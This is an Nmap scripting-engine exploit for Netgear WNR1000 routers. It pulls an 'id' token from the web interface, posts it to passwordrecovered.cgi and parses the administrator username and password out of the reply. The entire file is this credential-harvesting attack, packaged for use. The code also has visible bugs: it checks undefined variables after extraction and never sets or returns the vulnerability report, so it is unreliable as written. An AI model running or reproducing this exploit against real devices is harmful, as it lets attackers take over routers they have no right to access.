local http = require "http" local shortport = require "shortport" local stdnse = require "stdnse" local string = require "string" local vulns = require "vulns" description = [[ A vulnerability has been discovered in WNR 1000 series that allows an attacker to retrieve administrator credentials with the router interface. Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA Vulnerability discovered by c1ph04. ]] --- -- @usage -- nmap -sV --script http-vuln-wnr1000-creds -p80 -- @output -- PORT STATE SERVICE REASON -- 80/tcp open http syn-ack -- | http-vuln-wnr1000-creds: -- | VULNERABLE: -- | Netgear WNR1000v3 Credential Harvesting Exploit -- | State: VULNERABLE (Exploitable) -- | IDs: None, 0-day -- | Description: -- | A vulnerability has been discovered in WNR 1000 series that allows an attacker -- | to retrieve administrator credentials with the router interface. -- | Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA -- | Disclosure date: 26-01-2014 -- | References: -- |_ http://packetstormsecurity.com/files/download/124759/netgearpasswd-disclose.zip -- --- author = "Paul AMAR , Rob Nicholls" license = "Same as Nmap--See http://nmap.org/book/man-legal.html" categories = {"exploit","vuln","intrusive"} portrule = shortport.http -- function to escape specific characters local escape = function(str) return string.gsub(str, "", "") end action = function(host, port) local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/" local vuln = { title = 'Netgear WNR1000v3 Credential Harvesting Exploit', state = vulns.STATE.NOT_VULN, -- default description = [[ A vulnerability has been discovered in WNR 1000 series that allows an attacker to retrieve administrator credentials with the router interface. Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA. Vulnerability discovered by c1ph04. ]], references = { 'http://c1ph04text.blogspot.dk/2014/01/mitrm-attacks-your-middle-or-mine.html', }, dates = { disclosure = {year = '2014', month = '01', day = '26'}, }, } local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) local detection_session = http.get(host, port, uri) if detection_session then -- gather the id local id_netgear = string.match(escape(detection_session.body), ('(id=%d+)')) if id_netgear == nil then stdnse.print_debug(1, "%s: Unable to obtain the id", SCRIPT_NAME) return else -- send the payload to get username and password local payload_session = http.post(host, port, uri .. "passwordrecovered.cgi?" .. id_netgear, { no_cache = true }, nil, "") if payload_session then local netgear_username = string.match(escape(payload_session.body), 'Router Admin Username.+align="left">(.+).+Router Admin') local netgear_password = string.match(escape(payload_session.body), 'Router Admin Password.+align="left">(.+).+MNUText') if (username ~= nil and password ~= nil) then stdnse.print_debug(1, "%s: username : " .. escape(netgear_username), SCRIPT_NAME) stdnse.print_debug(1, "%s: password : " .. escape(netgear_password), SCRIPT_NAME) else stdnse.print_debug(1, "%s: We haven't been able to get username/password", SCRIPT_NAME) end end end end end